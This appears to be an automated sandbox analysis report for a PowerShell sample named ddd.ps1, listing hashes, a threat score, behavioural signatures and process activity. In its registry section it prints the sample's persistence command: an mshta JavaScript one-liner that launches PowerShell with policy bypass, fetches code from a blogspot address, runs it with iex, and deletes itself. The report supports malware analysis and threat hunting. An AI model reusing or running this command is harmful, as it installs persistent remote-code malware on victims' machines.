Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 18:03
Static task
static1
Behavioral task
behavioral1
Sample
ddd.ps1
Resource
win7-20240903-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
ddd.ps1
Resource
win10v2004-20250217-en
15 signatures
150 seconds
General
-
Target
ddd.ps1
-
Size
2.4MB
-
MD5
5b322ca0eb9655beaf39e4453d141cd2
-
SHA1
b556cbaf50c2b77fd73d4386f068f0bbffe7504d
-
SHA256
b2082d4666cd9eb57896b04058438fad6a268e504d877b908ae276b3c68799fe
-
SHA512
0648609146167599498b41bdb97c02eb0947ba03e44ee63c3448bd6b2508b4bd7054a63671c12120b01240bba810489da68e3f79dc2a7674447ad760127dcc1b
-
SSDEEP
1536:P26vgn00oR/S7rdvtk76qu6p5LSTFPNWdD7uHzgjw8b560jSKkjptOVNjC5GGQli:bYf
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 1980 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Desdwnessr2 = "mshta \"javascript:ve=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm hotelmainrat2024.blogspot.com/hegegehe | iex);Start-Sleep -Seconds 5;','run']; ls=[ve[3],ve[0],ve[1],ve[2]]; new ActiveXObject(ls[2])[ls[0]](ls[3], 0, true);close();new ActiveXObject(ls[1]).DeleteFile(WScript.ScriptFullName);\"\r\n" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defswadswner1 = "schtasks /run /tn Defswadswner1" powershell.exe -
pid Process 1980 powershell.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1980 powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ddd.ps11⤵
- Deletes itself
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980